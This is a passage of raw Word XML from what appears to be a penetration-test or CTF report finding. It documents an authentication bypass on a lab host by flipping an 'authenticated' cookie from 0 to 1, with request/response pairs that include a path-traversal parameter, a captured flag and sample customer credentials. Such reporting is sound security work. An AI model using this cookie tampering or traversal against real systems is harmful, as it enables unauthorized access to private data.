          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6B0A4" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D436A3B" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE6708" w14:textId="7663BB68" w:rsidR="005D1352" w:rsidRPr="005D1352" w:rsidRDefault="005D1352" w:rsidP="005D1352">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1352">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029AEE9B" w14:textId="04674F02" w:rsidR="00400385" w:rsidRDefault="00400385" w:rsidP="00400385">
      <w:r>
        <w:t xml:space="preserve">The application uses a cookie, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to validate </w:t>
      </w:r>
      <w:r w:rsidR="00F62F5D">
        <w:t>whether</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the user has successfully logged in to the application. The cookie uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value of</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to indicate the user’s authentication status. </w:t>
      </w:r>
      <w:r w:rsidR="00F62F5D">
        <w:t xml:space="preserve">This makes it possible for an attacker to change the value of the </w:t>
      </w:r>
      <w:r w:rsidR="00F62F5D" w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r w:rsidR="00F62F5D">
        <w:t xml:space="preserve"> cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F62F5D">
        <w:t>to bypass authorization controls and access protected resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F2D6E" w14:textId="1405D114" w:rsidR="00455A9D" w:rsidRDefault="00F62F5D" w:rsidP="00455A9D">
      <w:r>
        <w:t xml:space="preserve">When a user attempts to access protected resources, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/internal/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, without authentication, the application responds with an error message prompting the user to log in first, shown in the below request and response pair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815A2F6" w14:textId="4A1A1451" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">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455A9D" w14:paraId="09956E0E" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="312374D6" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GET </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/internal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customers.php?list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=..%2Fdata%2Fcustomer.list HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3845FC07" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE25A8D" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B8D466" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>authenticated=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3507DC26" w14:textId="22B92C97" w:rsidR="00455A9D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C766213" w14:textId="17421CE0" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">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F62F5D" w14:paraId="08BD0E05" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5F510EA2" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43AB3F9B" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date: Fri, 28 Apr 2023 10:43:55 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB40696" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">...omitted for </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>brevity</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="646D63D5"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header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="539BDD2F"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p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D81491D"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p&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Error: You must login first.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03DEACBD"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p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="109581EA" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18802FF8" w14:textId="52A5AAC6" w:rsidR="00F62F5D" w:rsidRPr="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00F62F5D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="319AF377" w14:textId="77777777" w:rsidR="00F62F5D" w:rsidRDefault="00F62F5D" w:rsidP="00455A9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29513812" w14:textId="0196F8E2" w:rsidR="005D1352" w:rsidRDefault="005D1352">
      <w:r>
        <w:t>The authentication error prevents the user from accessing the protected content.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A5C6C" w14:textId="6750FEF0" w:rsidR="00455A9D" w:rsidRDefault="00F62F5D" w:rsidP="00455A9D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>However, by intercepting the request and changing the value of authenticated from a 0 to a 1, the Hyperthetical team was able to access the protected resources without authentication, shown in the following request and response pair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02569967" w14:textId="77777777" w:rsidR="005D1352" w:rsidRPr="00F62F5D" w:rsidRDefault="005D1352" w:rsidP="005D1352">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5D1352" w14:paraId="274F5C58" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0CA0E680" w14:textId="77777777" w:rsidR="005D1352" w:rsidRPr="005D1352" w:rsidRDefault="005D1352" w:rsidP="005D1352">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GET </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/internal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customers.php?list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=..%2Fdata%2Fcustomer.list HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B77A2B" w14:textId="77777777" w:rsidR="005D1352" w:rsidRPr="005D1352" w:rsidRDefault="005D1352" w:rsidP="005D1352">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E2E2C2" w14:textId="2322033F" w:rsidR="005D1352" w:rsidRDefault="005D1352" w:rsidP="005D1352">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41754B4B" w14:textId="62386761" w:rsidR="005D1352" w:rsidRPr="005D1352" w:rsidRDefault="005D1352" w:rsidP="005D1352">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>authenticated=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A974592" w14:textId="4BD6570F" w:rsidR="005D1352" w:rsidRPr="005D1352" w:rsidRDefault="005D1352" w:rsidP="005D1352">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D1352">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9990A9" w14:textId="482C4484" w:rsidR="005D1352" w:rsidRPr="00F62F5D" w:rsidRDefault="005D1352" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A96513F" w14:textId="77777777" w:rsidR="005D1352" w:rsidRPr="00F62F5D" w:rsidRDefault="005D1352" w:rsidP="005D1352">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5D1352" w14:paraId="58336EBE" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1BB657CB" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D52D08D" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date: Fri</w:t>
            </w:r>
            <w:r w:rsidRPr="003C219B">
              <w:rPr>
                <w:rStyle w:val="BoxCodeChar"/>
              </w:rPr>
              <w:t>, 28 Apr 2023 10:54:21 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FD01CE" w14:textId="1EC34997" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="003C219B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AC31C0B"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div class="container"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A17C324"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header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA5FA57"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r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;p&gt;&lt;b&gt;Future Customers&lt;/b&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3681D9A3"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r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8709C6"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header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8EB651" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;p&gt;FOR </w:t>
            </w:r>
            <w:r w:rsidRPr="003C219B">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B0AAFE" w14:textId="77777777" w:rsidR="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;p&gt;flag2{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>authorized_user_access</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F4FC8C" w14:textId="2CCFA0B9" w:rsidR="00B40A5B" w:rsidRPr="00B40A5B" w:rsidRDefault="00B40A5B" w:rsidP="00B40A5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NqF5Rz@yahoo.com :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>connie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> //// </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F894665"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40A5B">
              <w:rPr>
                <w:sz w:val="20"/>
